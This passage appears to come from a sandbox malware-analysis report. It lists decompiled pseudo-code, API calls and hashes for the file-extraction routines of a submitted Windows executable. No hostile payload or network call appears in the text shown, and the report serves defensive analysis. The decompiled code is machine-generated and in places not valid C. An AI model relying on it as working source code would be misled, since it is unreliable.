                                                                                                                                                                                                    					_t23 = ( ~(__edx & 0x00000200) & 0x00000002) + 3;
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					if((__edx & 0x00000400) == 0) {
                                                                                                                                                                                                    						asm("sbb esi, esi");
                                                                                                                                                                                                    						_t23 = ( ~(__edx & 0x00000200) & 0xfffffffe) + 4;
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						_t23 = 1;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t7 = CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0); // executed
                                                                                                                                                                                                    				if(_t7 != 0xffffffff || _t23 == 3) {
                                                                                                                                                                                                    					return _t7;
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					E0017490C(_t11);
                                                                                                                                                                                                    					return CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0);
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    			}







                                                                                                                                                                                                    0x00174880
                                                                                                                                                                                                    0x0017488c
                                                                                                                                                                                                    0x00174894
                                                                                                                                                                                                    0x001748a0
                                                                                                                                                                                                    0x001748c9
                                                                                                                                                                                                    0x001748ce
                                                                                                                                                                                                    0x001748a2
                                                                                                                                                                                                    0x001748a8
                                                                                                                                                                                                    0x001748b7
                                                                                                                                                                                                    0x001748bc
                                                                                                                                                                                                    0x001748aa
                                                                                                                                                                                                    0x001748ac
                                                                                                                                                                                                    0x001748ac
                                                                                                                                                                                                    0x001748a8
                                                                                                                                                                                                    0x001748de
                                                                                                                                                                                                    0x001748e7
                                                                                                                                                                                                    0x0017490b
                                                                                                                                                                                                    0x001748ee
                                                                                                                                                                                                    0x001748f0
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00174902

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • CreateFileA.KERNELBASE(00008000,-80000000,00000000,00000000,?,00000080,00000000,00000000,00000000,00000000,00174A23,?,00174F67,*MEMCAB,00008000,00000180), ref: 001748DE
                                                                                                                                                                                                    • CreateFileA.KERNEL32(00008000,-80000000,00000000,00000000,?,00000080,00000000,?,00174F67,*MEMCAB,00008000,00000180), ref: 00174902
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.395541729.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.395528885.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395552778.0000000000178000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395563684.000000000017A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395563684.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_170000_file.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CreateFile
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 823142352-0
                                                                                                                                                                                                    • Opcode ID: 6abe94f12ee57d297e1ec7cba67a70b14d0c6389f6a43efdd7bd6685a3538882
                                                                                                                                                                                                    • Instruction ID: 3aecd95c509afe44023281999b5faeb14257578cfde34ef92ee0aef379e9e215
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6abe94f12ee57d297e1ec7cba67a70b14d0c6389f6a43efdd7bd6685a3538882
                                                                                                                                                                                                    • Instruction Fuzzy Hash: E10178A3E1153426F32440284C88BB7442CCBDA635F1B4230BEEEA65D1D3644C4081E0
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 93%
                                                                                                                                                                                                    			E00174AD0(signed int _a4, void* _a8, long _a12) {
                                                                                                                                                                                                    				signed int _t9;
                                                                                                                                                                                                    				int _t12;
                                                                                                                                                                                                    				signed int _t14;
                                                                                                                                                                                                    				signed int _t15;
                                                                                                                                                                                                    				void* _t20;
                                                                                                                                                                                                    				struct HWND__* _t21;
                                                                                                                                                                                                    				signed int _t24;
                                                                                                                                                                                                    				signed int _t25;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t20 =  *0x17858c; // 0xb8
                                                                                                                                                                                                    				_t9 = E00173680(_t20);
                                                                                                                                                                                                    				if( *0x1791d8 == 0) {
                                                                                                                                                                                                    					_push(_t24);
                                                                                                                                                                                                    					_t12 = WriteFile( *(0x178d74 + _a4 * 0x18), _a8, _a12,  &_a12, 0); // executed
                                                                                                                                                                                                    					if(_t12 != 0) {
                                                                                                                                                                                                    						_t25 = _a12;
                                                                                                                                                                                                    						if(_t25 != 0xffffffff) {
                                                                                                                                                                                                    							_t14 =  *0x179400; // 0x109096
                                                                                                                                                                                                    							_t15 = _t14 + _t25;
                                                                                                                                                                                                    							 *0x179400 = _t15;
                                                                                                                                                                                                    							if( *0x178184 != 0) {
                                                                                                                                                                                                    								_t21 =  *0x178584; // 0x0
                                                                                                                                                                                                    								if(_t21 != 0) {
                                                                                                                                                                                                    									SendDlgItemMessageA(_t21, 0x83a, 0x402, _t15 * 0x64 /  *0x1793f8, 0);
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						_t25 = _t24 | 0xffffffff;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					return _t25;
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					return _t9 | 0xffffffff;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    			}











                                                                                                                                                                                                    0x00174ad5
                                                                                                                                                                                                    0x00174adb
                                                                                                                                                                                                    0x00174ae7
                                                                                                                                                                                                    0x00174aee
                                                                                                                                                                                                    0x00174b05
                                                                                                                                                                                                    0x00174b0d
                                                                                                                                                                                                    0x00174b14
                                                                                                                                                                                                    0x00174b1a
                                                                                                                                                                                                    0x00174b1c
                                                                                                                                                                                                    0x00174b21
                                                                                                                                                                                                    0x00174b2a
                                                                                                                                                                                                    0x00174b2f
                                                                                                                                                                                                    0x00174b31
                                                                                                                                                                                                    0x00174b39
                                                                                                                                                                                                    0x00174b54
                                                                                                                                                                                                    0x00174b54
                                                                                                                                                                                                    0x00174b39
                                                                                                                                                                                                    0x00174b2f
                                                                                                                                                                                                    0x00174b0f
                                                                                                                                                                                                    0x00174b0f
                                                                                                                                                                                                    0x00174b0f
                                                                                                                                                                                                    0x00174b5e
                                                                                                                                                                                                    0x00174ae9
                                                                                                                                                                                                    0x00174aed
                                                                                                                                                                                                    0x00174aed

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 00173680: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 0017369F
                                                                                                                                                                                                      • Part of subcall function 00173680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 001736B2
                                                                                                                                                                                                      • Part of subcall function 00173680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 001736DA
                                                                                                                                                                                                    • WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 00174B05
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.395541729.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.395528885.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395552778.0000000000178000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395563684.000000000017A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395563684.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_170000_file.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: MessagePeek$FileMultipleObjectsWaitWrite
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1084409-0
                                                                                                                                                                                                    • Opcode ID: 900814330924ef4c992bad46fd0b393e7df096d165e2a534bbde513b07d28d02
                                                                                                                                                                                                    • Instruction ID: ad094df40e043e7c6717ee5e15b8a02ff54771d1c4936e67e5a6eca41d525e96
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 900814330924ef4c992bad46fd0b393e7df096d165e2a534bbde513b07d28d02
                                                                                                                                                                                                    • Instruction Fuzzy Hash: DF012931280205ABDB149F68DC09BA6B779AB44725F148225F93D975E0CB70DCD5CB90
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                    			E0017658A(char* __ecx, void* __edx, char* _a4) {
                                                                                                                                                                                                    				intOrPtr _t4;
                                                                                                                                                                                                    				char* _t6;
                                                                                                                                                                                                    				char* _t8;
                                                                                                                                                                                                    				void* _t10;
                                                                                                                                                                                                    				void* _t12;
                                                                                                                                                                                                    				char* _t16;
                                                                                                                                                                                                    				intOrPtr* _t17;
                                                                                                                                                                                                    				void* _t18;
                                                                                                                                                                                                    				char* _t19;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t16 = __ecx;
                                                                                                                                                                                                    				_t10 = __edx;
                                                                                                                                                                                                    				_t17 = __ecx;
                                                                                                                                                                                                    				_t1 = _t17 + 1; // 0x178b3f
                                                                                                                                                                                                    				_t12 = _t1;
                                                                                                                                                                                                    				do {
                                                                                                                                                                                                    					_t4 =  *_t17;
                                                                                                                                                                                                    					_t17 = _t17 + 1;
                                                                                                                                                                                                    				} while (_t4 != 0);
                                                                                                                                                                                                    				_t18 = _t17 - _t12;
                                                                                                                                                                                                    				_t2 = _t18 + 1; // 0x178b40
                                                                                                                                                                                                    				if(_t2 < __edx) {
                                                                                                                                                                                                    					_t19 = _t18 + __ecx;
                                                                                                                                                                                                    					if(_t19 > __ecx) {
                                                                                                                                                                                                    						_t8 = CharPrevA(__ecx, _t19); // executed
                                                                                                                                                                                                    						if( *_t8 != 0x5c) {
                                                                                                                                                                                                    							 *_t19 = 0x5c;
                                                                                                                                                                                                    							_t19 =  &(_t19[1]);
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_t6 = _a4;
                                                                                                                                                                                                    					 *_t19 = 0;
                                                                                                                                                                                                    					while( *_t6 == 0x20) {
                                                                                                                                                                                                    						_t6 = _t6 + 1;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					return E001716B3(_t16, _t10, _t6);
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return 0x8007007a;
                                                                                                                                                                                                    			}












                                                                                                                                                                                                    0x00176592
                                                                                                                                                                                                    0x00176594
                                                                                                                                                                                                    0x00176596
                                                                                                                                                                                                    0x00176598
                                                                                                                                                                                                    0x00176598
                                                                                                                                                                                                    0x0017659b
                                                                                                                                                                                                    0x0017659b
                                                                                                                                                                                                    0x0017659d
                                                                                                                                                                                                    0x0017659e
                                                                                                                                                                                                    0x001765a2
                                                                                                                                                                                                    0x001765a4
                                                                                                                                                                                                    0x001765a9
                                                                                                                                                                                                    0x001765b2
                                                                                                                                                                                                    0x001765b6
                                                                                                                                                                                                    0x001765ba
                                                                                                                                                                                                    0x001765c3
                                                                                                                                                                                                    0x001765c5
                                                                                                                                                                                                    0x001765c8
                                                                                                                                                                                                    0x001765c8
                                                                                                                                                                                                    0x001765c3
                                                                                                                                                                                                    0x001765c9
                                                                                                                                                                                                    0x001765cc
                                                                                                                                                                                                    0x001765d2
                                                                                                                                                                                                    0x001765d1
                                                                                                                                                                                                    0x001765d1
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001765dc
                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • CharPrevA.USER32(00178B3E,00178B3F,00000001,00178B3E,-00000003,?,001760EC,00171140,?), ref: 001765BA
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.395541729.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.395528885.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395552778.0000000000178000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395563684.000000000017A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395563684.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_170000_file.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CharPrev
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 122130370-0
                                                                                                                                                                                                    • Opcode ID: 6152a77c9df0ed4777d6804b3a1e1867bf663f4eff57a38ba41108b677a3e1d4
                                                                                                                                                                                                    • Instruction ID: 506f6040169f9361186d460971537502c39c77e90fc2fa7bc0a5a94d848c3fdf
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6152a77c9df0ed4777d6804b3a1e1867bf663f4eff57a38ba41108b677a3e1d4
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 71F042321046505BD336051D9884B76BFFD9BD6390F25816EF8DEC3209DB554C4693A0
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 93%
                                                                                                                                                                                                    			E0017621E() {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				char _v268;
                                                                                                                                                                                                    				signed int _t5;
                                                                                                                                                                                                    				void* _t9;
                                                                                                                                                                                                    				void* _t13;
                                                                                                                                                                                                    				void* _t19;
                                                                                                                                                                                                    				void* _t20;
                                                                                                                                                                                                    				signed int _t21;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t5 =  *0x178004; // 0x4ffa21aa
                                                                                                                                                                                                    				_v8 = _t5 ^ _t21;
                                                                                                                                                                                                    				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                    					0x4f0 = 2;
                                                                                                                                                                                                    					_t9 = E0017597D( &_v268, 0x4f0, _t19, 0x4f0); // executed
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					E001744B9(0, 0x4f0, _t8, _t8, 0x10, _t8);
                                                                                                                                                                                                    					 *0x179124 = E00176285();
                                                                                                                                                                                                    					_t9 = 0;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return E00176CE0(_t9, _t13, _v8 ^ _t21, 0x4f0, _t19, _t20);
                                                                                                                                                                                                    			}











                                                                                                                                                                                                    0x00176229
                                                                                                                                                                                                    0x00176230
                                                                                                                                                                                                    0x00176247
                                                                                                                                                                                                    0x0017626a
                                                                                                                                                                                                    0x00176272
                                                                                                                                                                                                    0x00176249
                                                                                                                                                                                                    0x00176255
                                                                                                                                                                                                    0x0017625f
                                                                                                                                                                                                    0x00176264
                                                                                                                                                                                                    0x00176264
                                                                                                                                                                                                    0x00176284

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0017623F
                                                                                                                                                                                                      • Part of subcall function 001744B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00174518
                                                                                                                                                                                                      • Part of subcall function 001744B9: MessageBoxA.USER32(?,?,nst0dum,00010010), ref: 00174554
                                                                                                                                                                                                      • Part of subcall function 00176285: GetLastError.KERNEL32(00175BBC), ref: 00176285
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.395541729.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.395528885.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395552778.0000000000178000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395563684.000000000017A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395563684.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_170000_file.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: DirectoryErrorLastLoadMessageStringWindows
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 381621628-0
                                                                                                                                                                                                    • Opcode ID: 01ba2e4012862fb85bd9bb855f73d37adbe9a7453b65da373d6f41881c20e1ec
                                                                                                                                                                                                    • Instruction ID: dc4c00da1ebde0d843d301b61b714b9d149e3f3edf915ddd6c1c20308b20a5ac
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 01ba2e4012862fb85bd9bb855f73d37adbe9a7453b65da373d6f41881c20e1ec
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 23F0E9B0744208ABE790EB748D06FBE33BCDB54300F408469B98ED6082DF749DC48650
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                    			E00174B60(signed int _a4) {
                                                                                                                                                                                                    				signed int _t9;
                                                                                                                                                                                                    				signed int _t15;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t15 = _a4 * 0x18;
                                                                                                                                                                                                    				if( *((intOrPtr*)(_t15 + 0x178d64)) != 1) {
                                                                                                                                                                                                    					_t9 = FindCloseChangeNotification( *(_t15 + 0x178d74)); // executed
                                                                                                                                                                                                    					if(_t9 == 0) {
                                                                                                                                                                                                    						return _t9 | 0xffffffff;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					 *((intOrPtr*)(_t15 + 0x178d60)) = 1;
                                                                                                                                                                                                    					return 0;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				 *((intOrPtr*)(_t15 + 0x178d60)) = 1;
                                                                                                                                                                                                    				 *((intOrPtr*)(_t15 + 0x178d68)) = 0;
                                                                                                                                                                                                    				 *((intOrPtr*)(_t15 + 0x178d70)) = 0;
                                                                                                                                                                                                    				 *((intOrPtr*)(_t15 + 0x178d6c)) = 0;
                                                                                                                                                                                                    				return 0;
                                                                                                                                                                                                    			}





                                                                                                                                                                                                    0x00174b66
                                                                                                                                                                                                    0x00174b74
                                                                                                                                                                                                    0x00174b98
                                                                                                                                                                                                    0x00174ba0
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00174bac
                                                                                                                                                                                                    0x00174ba4
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00174ba4
                                                                                                                                                                                                    0x00174b78
                                                                                                                                                                                                    0x00174b7e
                                                                                                                                                                                                    0x00174b84
                                                                                                                                                                                                    0x00174b8a
                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • FindCloseChangeNotification.KERNELBASE(?,00000000,00000000,?,00174FA1,00000000), ref: 00174B98
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.395541729.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.395528885.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395552778.0000000000178000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395563684.000000000017A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395563684.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_170000_file.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ChangeCloseFindNotification
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2591292051-0
                                                                                                                                                                                                    • Opcode ID: 3163ce6b0ba009b4cf6c551f5413c584283b10dbc529f724b34eb37f068b1e08
                                                                                                                                                                                                    • Instruction ID: 4534ce1ff41ad4a2c61ac80b1348eb4f061c9223b225fb90edc41282ac9e9112
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3163ce6b0ba009b4cf6c551f5413c584283b10dbc529f724b34eb37f068b1e08
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4FF0F831680B089FC771DEBACC08652BBF4AAA53A5711492A946ED2194EB30AC41CB90
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                    			E001766AE(CHAR* __ecx) {
                                                                                                                                                                                                    				unsigned int _t1;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t1 = GetFileAttributesA(__ecx); // executed
                                                                                                                                                                                                    				if(_t1 != 0xffffffff) {
                                                                                                                                                                                                    					return  !(_t1 >> 4) & 0x00000001;
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					return 0;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    			}




                                                                                                                                                                                                    0x001766b1
                                                                                                                                                                                                    0x001766ba
                                                                                                                                                                                                    0x001766c7
                                                                                                                                                                                                    0x001766bc
                                                                                                                                                                                                    0x001766be
                                                                                                                                                                                                    0x001766be

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetFileAttributesA.KERNELBASE(?,00174777,?,00174E38,?), ref: 001766B1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.395541729.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.395528885.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395552778.0000000000178000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395563684.000000000017A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395563684.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_170000_file.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AttributesFile
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3188754299-0
                                                                                                                                                                                                    • Opcode ID: 93e7a5d930c4421a83581e0b7ef7094eb15a2dce319894636e5195a741e4d13d
                                                                                                                                                                                                    • Instruction ID: 01f94deb22c20ddda29f0bba8c1bd4ede3be06b3a6c8a317013c675170b502d5
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 93e7a5d930c4421a83581e0b7ef7094eb15a2dce319894636e5195a741e4d13d
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 08B09276222840426E2006316C2955A2861BBC123A7E85B90F03AC05E0CB3EC886D004
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                    			E00174CA0(long _a4) {
                                                                                                                                                                                                    				void* _t2;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t2 = GlobalAlloc(0, _a4); // executed
                                                                                                                                                                                                    				return _t2;
                                                                                                                                                                                                    			}




                                                                                                                                                                                                    0x00174caa
                                                                                                                                                                                                    0x00174cb1

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GlobalAlloc.KERNELBASE(00000000,?), ref: 00174CAA
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.395541729.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.395528885.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395552778.0000000000178000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395563684.000000000017A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395563684.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_170000_file.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AllocGlobal
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3761449716-0
                                                                                                                                                                                                    • Opcode ID: 1a93f7d025a10f1a39f2475edffe8c87315c3dcea7237b9907621988591fadfd
                                                                                                                                                                                                    • Instruction ID: 9b2952618aa25510991c3bdc193e716f8b47d09656d49e340294c1524a211ce8
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1a93f7d025a10f1a39f2475edffe8c87315c3dcea7237b9907621988591fadfd
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3FB0123208420CB7CF001FC2EC09F893F6DFBC4761F540000F60C454508A7294908696
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                    			E00174CC0(void* _a4) {
                                                                                                                                                                                                    				void* _t2;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t2 = GlobalFree(_a4); // executed
                                                                                                                                                                                                    				return _t2;
                                                                                                                                                                                                    			}




                                                                                                                                                                                                    0x00174cc8
                                                                                                                                                                                                    0x00174ccf

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.395541729.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.395528885.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395552778.0000000000178000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395563684.000000000017A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395563684.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_170000_file.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: FreeGlobal
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2979337801-0
                                                                                                                                                                                                    • Opcode ID: 7a48330777ca7a42e808818e449ffba473d4ab7d13524da4beedbd372a88cb3b
                                                                                                                                                                                                    • Instruction ID: 8c6dcd4705196a6dd5ac75da0b0e2ffe0b01f34a964307236d6b3f57a7e9bccb
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7a48330777ca7a42e808818e449ffba473d4ab7d13524da4beedbd372a88cb3b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: B1B0123104010CBB8F001B42EC088493F2DDBC02607400010F50C414218B3398918585
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 92%
                                                                                                                                                                                                    			E00175C9E(void* __ebx, CHAR* __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				signed int _v12;
                                                                                                                                                                                                    				CHAR* _v265;
                                                                                                                                                                                                    				char _v266;
                                                                                                                                                                                                    				char _v267;
                                                                                                                                                                                                    				char _v268;
                                                                                                                                                                                                    				CHAR* _v272;
                                                                                                                                                                                                    				char _v276;
                                                                                                                                                                                                    				signed int _v296;
                                                                                                                                                                                                    				char _v556;
                                                                                                                                                                                                    				signed int _t61;
                                                                                                                                                                                                    				int _t63;
                                                                                                                                                                                                    				char _t67;
                                                                                                                                                                                                    				CHAR* _t69;
                                                                                                                                                                                                    				signed int _t71;
                                                                                                                                                                                                    				void* _t75;
                                                                                                                                                                                                    				char _t79;
                                                                                                                                                                                                    				void* _t83;
                                                                                                                                                                                                    				void* _t85;
                                                                                                                                                                                                    				void* _t87;
                                                                                                                                                                                                    				intOrPtr _t88;
                                                                                                                                                                                                    				void* _t100;
                                                                                                                                                                                                    				intOrPtr _t101;
                                                                                                                                                                                                    				CHAR* _t104;
                                                                                                                                                                                                    				intOrPtr _t105;
                                                                                                                                                                                                    				void* _t111;
                                                                                                                                                                                                    				void* _t115;
                                                                                                                                                                                                    				CHAR* _t118;
                                                                                                                                                                                                    				void* _t119;
                                                                                                                                                                                                    				void* _t127;
                                                                                                                                                                                                    				CHAR* _t129;
                                                                                                                                                                                                    				void* _t132;
